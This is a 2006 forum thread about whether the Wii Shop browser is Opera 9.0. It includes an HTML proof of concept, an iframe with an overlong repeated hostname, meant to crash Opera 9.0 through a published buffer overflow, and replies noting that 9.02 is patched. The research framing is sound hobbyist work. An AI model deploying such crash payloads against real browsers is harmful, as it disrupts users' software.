WiiLi Wiki frontpage Include your post in the News Get links Hoteles Quito
WiiLi.org Forum Index WiiLi.org
a new revolution
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Opera 9 vulnerabilities in Wii Shop browser?

 
Post new topic   Reply to topic    WiiLi.org Forum Index -> WiiLi General Discussion
View previous topic :: View next topic  
Author Message
goatjuggler



Joined: 28 Nov 2006
Posts: 2

Digg It
PostPosted: Tue Nov 28, 2006 11:55 am    Post subject: Opera 9 vulnerabilities in Wii Shop browser?
Since the user agent for the Wii Shop Channel/Browser says Opera 9.0, I figured I'd look into any vulnerabilities reported for Opera 9.0. I started with an easy buffer overflow described here:

http://secunia.com/advisories/22218/

No proof of concepts or exploits exist yet so I installed Opera 9.0 on my Windows box and came up with one that consistently crashes it.

I don't have a Wii yet to test it on, so here's a link to the example which always crashes Opera for me:

http://tinyurl.com/yyfuur

Here's the phancy code, if you don't trust me, load up that link in Firefox and view source:

Code:

<html>

<iframe src="
http://www.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.
WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.
WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.WII.
WII.WIIW.com
"></iframe>

</html>


It doesn't look like it's very exploitable, but if it crashes the Wii Browser, at least we know it's actually Opera 9.0.

n.b. remove carriage returns from code if you copy/paste.
Back to top
View user's profile Send private message
TrueJournals



Joined: 09 Nov 2006
Posts: 36

Digg It
PostPosted: Tue Nov 28, 2006 11:57 pm    Post subject:
Hmm... the page doesn't seem to crash Opera 9.02 on MacOSX... since the Wii is PPC-based, like Macs.. So, we might have to find something else... or just not use this exploit.
Back to top
View user's profile Send private message AIM Address
goatjuggler



Joined: 28 Nov 2006
Posts: 2

Digg It
PostPosted: Wed Nov 29, 2006 1:50 am    Post subject:
Apparently I forgot to mention that Opera 9.02 is not affected.
From the Secunia link:

Quote:
Solution:
Update to version 9.02.


I'm using 9.0 for these purposes since the Wii useragent string reads "Opera 9.00"
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    WiiLi.org Forum Index -> WiiLi General Discussion All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group